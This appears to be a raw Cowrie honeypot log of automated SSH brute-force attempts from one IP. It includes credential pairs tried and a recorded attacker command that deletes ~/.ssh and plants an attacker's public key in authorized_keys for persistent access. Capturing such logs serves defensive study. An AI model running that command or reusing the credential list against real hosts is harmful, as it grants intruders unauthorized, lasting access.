{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:27:00.236688Z","src_ip":"212.227.235.229","session":"3dd82dc819f1"}
{"eventid":"cowrie.login.failed","username":"slave","password":"1","message":"login attempt [slave/1] failed","sensor":"my-vps","timestamp":"2025-09-09T01:27:00.746364Z","src_ip":"212.227.235.229","session":"3dd82dc819f1"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:27:01.866508Z","src_ip":"212.227.235.229","session":"3dd82dc819f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53662,"dst_ip":"1.2.3.4","dst_port":22,"session":"a07e631acf3b","protocol":"ssh","message":"New connection: 212.227.235.229:53662 (1.2.3.4:22) [session: a07e631acf3b]","sensor":"my-vps","timestamp":"2025-09-09T01:27:01.913468Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:27:01.914460Z","src_ip":"212.227.235.229","session":"a07e631acf3b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:27:02.149086Z","src_ip":"212.227.235.229","session":"a07e631acf3b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51016,"dst_ip":"1.2.3.4","dst_port":22,"session":"46515a6d7b0d","protocol":"ssh","message":"New connection: 212.227.235.229:51016 (1.2.3.4:22) [session: 46515a6d7b0d]","sensor":"my-vps","timestamp":"2025-09-09T01:27:03.187663Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:27:03.188876Z","src_ip":"212.227.235.229","session":"46515a6d7b0d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:27:03.421542Z","src_ip":"212.227.235.229","session":"46515a6d7b0d"}
{"eventid":"cowrie.login.success","username":"root","password":"Kong@2022","message":"login attempt [root/Kong@2022] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:27:04.205412Z","src_ip":"212.227.235.229","session":"a07e631acf3b"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T01:27:04.355752Z","src_ip":"212.227.235.229","session":"46515a6d7b0d"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:27:05.591395Z","src_ip":"212.227.235.229","session":"46515a6d7b0d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:27:05.745482Z","src_ip":"212.227.235.229","session":"a07e631acf3b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:27:05.746242Z","src_ip":"212.227.235.229","session":"a07e631acf3b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:27:05.747253Z","src_ip":"212.227.235.229","session":"a07e631acf3b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:27:05.972819Z","src_ip":"212.227.235.229","session":"a07e631acf3b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:27:06.557593Z","src_ip":"212.227.235.229","session":"a07e631acf3b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:27:06.558267Z","src_ip":"212.227.235.229","session":"a07e631acf3b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:27:06.801013Z","src_ip":"212.227.235.229","session":"a07e631acf3b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:27:06.801878Z","src_ip":"212.227.235.229","session":"a07e631acf3b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35978,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c743dc2c030","protocol":"ssh","message":"New connection: 212.227.235.229:35978 (1.2.3.4:22) [session: 3c743dc2c030]","sensor":"my-vps","timestamp":"2025-09-09T01:27:15.028305Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:27:15.029218Z","src_ip":"212.227.235.229","session":"3c743dc2c030"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:27:15.255316Z","src_ip":"212.227.235.229","session":"3c743dc2c030"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:27:16.259834Z","src_ip":"212.227.235.229","session":"3c743dc2c030"}
{"eventid":"cowrie.session.closed","duration":"14.6","message":"Connection lost after 14.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:27:16.481066Z","src_ip":"212.227.235.229","session":"a07e631acf3b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:27:16.482893Z","src_ip":"212.227.235.229","session":"3c743dc2c030"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60402,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d060ce2ed4b","protocol":"ssh","message":"New connection: 212.227.235.229:60402 (1.2.3.4:22) [session: 5d060ce2ed4b]","sensor":"my-vps","timestamp":"2025-09-09T01:27:21.065852Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:27:21.066783Z","src_ip":"212.227.235.229","session":"5d060ce2ed4b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:27:21.307085Z","src_ip":"212.227.235.229","session":"5d060ce2ed4b"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"111111","message":"login attempt [nginx/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:27:22.271778Z","src_ip":"212.227.235.229","session":"5d060ce2ed4b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:27:23.518173Z","src_ip":"212.227.235.229","session":"5d060ce2ed4b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58702,"dst_ip":"1.2.3.4","dst_port":22,"session":"d56e8cf9e2e5","protocol":"ssh","message":"New connection: 212.227.235.229:58702 (1.2.3.4:22) [session: d56e8cf9e2e5]","sensor":"my-vps","timestamp":"2025-09-09T01:27:24.409909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:27:24.410928Z","src_ip":"212.227.235.229","session":"d56e8cf9e2e5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:27:24.678588Z","src_ip":"212.227.235.229","session":"d56e8cf9e2e5"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"P@ssword123","message":"login attempt [deploy/P@ssword123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:27:25.789638Z","src_ip":"212.227.235.229","session":"d56e8cf9e2e5"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:27:27.059924Z","src_ip":"212.227.235.229","session":"d56e8cf9e2e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60116,"dst_ip":"1.2.3.4","dst_port":22,"session":"5dc1b5fb98b1","protocol":"ssh","message":"New connection: 212.227.235.229:60116 (1.2.3.4:22) [session: 5dc1b5fb98b1]","sensor":"my-vps","timestamp":"2025-09-09T01:27:28.904433Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:27:28.905046Z","src_ip":"212.227.235.229","session":"5dc1b5fb98b1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:27:29.154430Z","src_ip":"212.227.235.229","session":"5dc1b5fb98b1"}
{"eventid":"cowrie.login.failed","username":"hunter","password":"Password123","message":"login attempt [hunter/Password123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:27:30.191681Z","src_ip":"212.227.235.229","session":"5dc1b5fb98b1"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:27:31.443966Z","src_ip":"212.227.235.229","session":"5dc1b5fb98b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40450,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d39dca9f6b0","protocol":"ssh","message":"New connection: 212.227.235.229:40450 (1.2.3.4:22) [session: 6d39dca9f6b0]","sensor":"my-vps","timestamp":"2025-09-09T01:27:37.543853Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:27:37.544607Z","src_ip":"212.227.235.229","session":"6d39dca9f6b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:27:37.652749Z","src_ip":"212.227.235.229","session":"6d39dca9f6b0"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"111111","message":"login attempt [nginx/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:27:38.125934Z","src_ip":"212.227.235.229","session":"6d39dca9f6b0"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:27:39.236192Z","src_ip":"212.227.235.229","session":"6d39dca9f6b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60042,"dst_ip":"1.2.3.4","dst_port":23,"session":"a6aa20967419","protocol":"telnet","message":"New connection: 212.227.235.229:60042 (1.2.3.4:23) [session: a6aa20967419]","sensor":"my-vps","timestamp":"2025-09-09T01:27:46.834701Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49538,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcf908cad84d","protocol":"ssh","message":"New connection: 212.227.235.229:49538 (1.2.3.4:22) [session: bcf908cad84d]","sensor":"my-vps","timestamp":"2025-09-09T01:27:50.096989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:27:50.097734Z","src_ip":"212.227.235.229","session":"bcf908cad84d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:27:50.329719Z","src_ip":"212.227.235.229","session":"bcf908cad84d"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"!","message":"login attempt [administrator/!] failed","sensor":"my-vps","timestamp":"2025-09-09T01:27:51.297783Z","src_ip":"212.227.235.229","session":"bcf908cad84d"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:27:52.531994Z","src_ip":"212.227.235.229","session":"bcf908cad84d"}
